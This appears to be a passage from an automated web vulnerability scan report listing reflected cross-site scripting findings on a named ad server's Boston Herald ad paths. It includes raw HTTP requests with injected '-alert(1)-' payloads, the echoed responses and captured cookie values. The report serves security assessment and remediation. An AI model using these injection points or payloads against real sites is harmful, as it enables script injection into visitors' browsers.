GET /cmadjc29a3'-alert(1)-'a7c73f96421/iblocal.revinet.bostonherald/audience;sz=300x250;net=iblocal;ord=0.9691057777963579;env=ifr;ord1=80394;cmpgurl=http%253A//www.bostonherald.com/? HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:54:34 GMT Connection: close Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:54:34 GMT Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sat, 29-Jan-2011 09:54:34 GMT Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:54:34 GMT Content-Length: 8164
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-22784626_1296266074","http://ad.doubleclick.net/adjc29a3'-alert(1)-'a7c73f96421/iblocal.revinet.bostonherald/audience;net=iblocal;u=,iblocal-22784626_1296266074,11d765b6a10b1b3,Miscellaneous,ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7- ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a69b'-alert(1)-'5df7ba57f4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/iblocal.revinet.bostonherald4a69b'-alert(1)-'5df7ba57f4/audience;sz=300x250;net=iblocal;ord=0.9691057777963579;env=ifr;ord1=80394;cmpgurl=http%253A//www.bostonherald.com/? HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:54:35 GMT Connection: close Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:54:35 GMT Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sat, 29-Jan-2011 09:54:35 GMT Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:54:35 GMT Content-Length: 8155
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-54069803_1296266075","http://ad.doubleclick.net/adj/iblocal.revinet.bostonherald4a69b'-alert(1)-'5df7ba57f4/audience;net=iblocal;u=,iblocal-54069803_1296266075,11d765b6a10b1b3,Miscellaneous,ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c1e1'-alert(1)-'5c79f4e4b95 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/iblocal.revinet.bostonherald/audience3c1e1'-alert(1)-'5c79f4e4b95;sz=300x250;net=iblocal;ord=0.9691057777963579;env=ifr;ord1=80394;cmpgurl=http%253A//www.bostonherald.com/? HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:54:36 GMT Connection: close Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:54:36 GMT Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sat, 29-Jan-2011 09:54:36 GMT Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:54:36 GMT Content-Length: 8156
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-25417174_1296266076","http://ad.doubleclick.net/adj/iblocal.revinet.bostonherald/audience3c1e1'-alert(1)-'5c79f4e4b95;net=iblocal;u=,iblocal-25417174_1296266076,11d765b6a10b1b3,Miscellaneous,ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.wea ...[SNIP]...
4.53. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/cmadj/iblocal.revinet.bostonherald/audience
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50801'-alert(1)-'61d025e556e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/iblocal.revinet.bostonherald/audience?50801'-alert(1)-'61d025e556e=1 HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 7549 Date: Sat, 29 Jan 2011 05:19:36 GMT Connection: close
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-55331544_1296278376","http://ad.doubleclick.net//iblocal.revinet.bostonherald/audience?50801'-alert(1)-'61d025e556e=1;net=iblocal;u=,iblocal-55331544_1296278376,11d765b6a10b1b3,none,ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8835d'-alert(1)-'23dd9848d70 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/iblocal.revinet.bostonherald/audience;sz=8835d'-alert(1)-'23dd9848d70 HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:54:26 GMT Connection: close Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:54:26 GMT Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sat, 29-Jan-2011 09:54:26 GMT Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:54:26 GMT Content-Length: 8099
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... cal;u=,iblocal-53332311_1296266066,11d765b6a10b1b3,none,ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h;;sz=8835d'-alert(1)-'23dd9848d70;contx=none;dc=w;btg=ex.32;btg=ex.76;btg=bk.rdst1;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l; ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39f09'-alert(1)-'5901c85919a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:54:46 GMT Connection: close Content-Length: 7653
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-39606642_1296266086","http://ad.doubleclick.net/adj39f09'-alert(1)-'5901c85919a/q1.bosherald/be_ent;net=q1;u=,q1-39606642_1296266086,11d765b6a10b1b3,ent,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8 ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba16c'-alert(1)-'c2fbc8b1d49 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:54:46 GMT Connection: close Content-Length: 7645
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-14122048_1296266086","http://ad.doubleclick.net/adj/q1.bosheraldba16c'-alert(1)-'c2fbc8b1d49/be_ent;net=q1;u=,q1-14122048_1296266086,11d765b6a10b1b3,ent,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-c ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 148cd'-alert(1)-'f73be52e6c0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:54:46 GMT Connection: close Content-Length: 7645
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-36999889_1296266086","http://ad.doubleclick.net/adj/q1.bosherald/be_ent148cd'-alert(1)-'f73be52e6c0;net=q1;u=,q1-36999889_1296266086,11d765b6a10b1b3,ent,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sport ...[SNIP]...
4.58. http://a.collective-media.net/cmadj/q1.bosherald/be_ent [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/cmadj/q1.bosherald/be_ent
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f21c'-alert(1)-'d04176c671d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/q1.bosherald/be_ent;sz=300x250;net=q1;ord=2134060438?;&5f21c'-alert(1)-'d04176c671d=1 HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 7631 Date: Sat, 29 Jan 2011 05:19:40 GMT Connection: close
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... b1b3,none,q1.none_h-q1.ent_h-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h;;sz=300x250;net=q1;&5f21c'-alert(1)-'d04176c671d=1;contx=none;dc=w;btg=q1.none_h;btg=q1.ent_h;btg=q1.polit_l;btg=ex.32;btg=ex.76;btg=bk.rdst1;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;bt ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9623d'-alert(1)-'9f272341de0 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:54:36 GMT Connection: close Content-Length: 7619
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... 6076,11d765b6a10b1b3,none,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h;;sz=9623d'-alert(1)-'9f272341de0;contx=none;dc=w;btg=q1.none_h;btg=q1.ent_m;btg=q1.polit_l;btg=ex.32;btg=ex.76;btg=bk.rdst1;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg= ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 549b1'-alert(1)-'fc8e7858573 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:54:41 GMT Connection: close Content-Length: 7656
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-54426313_1296266081","http://ad.doubleclick.net/adj549b1'-alert(1)-'fc8e7858573/q1.bosherald/be_ent_fr;net=q1;u=,q1-54426313_1296266081,11d765b6a10b1b3,ent,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rd ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eea20'-alert(1)-'a4b741dc452 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:54:41 GMT Connection: close Content-Length: 7648
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-88653520_1296266081","http://ad.doubleclick.net/adj/q1.bosheraldeea20'-alert(1)-'a4b741dc452/be_ent_fr;net=q1;u=,q1-88653520_1296266081,11d765b6a10b1b3,ent,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_ ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload feec8'-alert(1)-'139d285e531 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:54:42 GMT Connection: close Content-Length: 7648
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-50028198_1296266082","http://ad.doubleclick.net/adj/q1.bosherald/be_ent_frfeec8'-alert(1)-'139d285e531;net=q1;u=,q1-50028198_1296266082,11d765b6a10b1b3,ent,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sport ...[SNIP]...
4.63. http://a.collective-media.net/cmadj/q1.bosherald/be_ent_fr [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/cmadj/q1.bosherald/be_ent_fr
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6329'-alert(1)-'26662898743 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/q1.bosherald/be_ent_fr;sz=300x250;net=q1;ord=1194202561?;&f6329'-alert(1)-'26662898743=1 HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 7634 Date: Sat, 29 Jan 2011 05:19:39 GMT Connection: close
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... b1b3,none,q1.none_h-q1.ent_h-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h;;sz=300x250;net=q1;&f6329'-alert(1)-'26662898743=1;contx=none;dc=w;btg=q1.none_h;btg=q1.ent_h;btg=q1.polit_l;btg=ex.32;btg=ex.76;btg=bk.rdst1;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;bt ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b11b4'-alert(1)-'a0b31f3de82 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:54:33 GMT Connection: close Content-Length: 7622
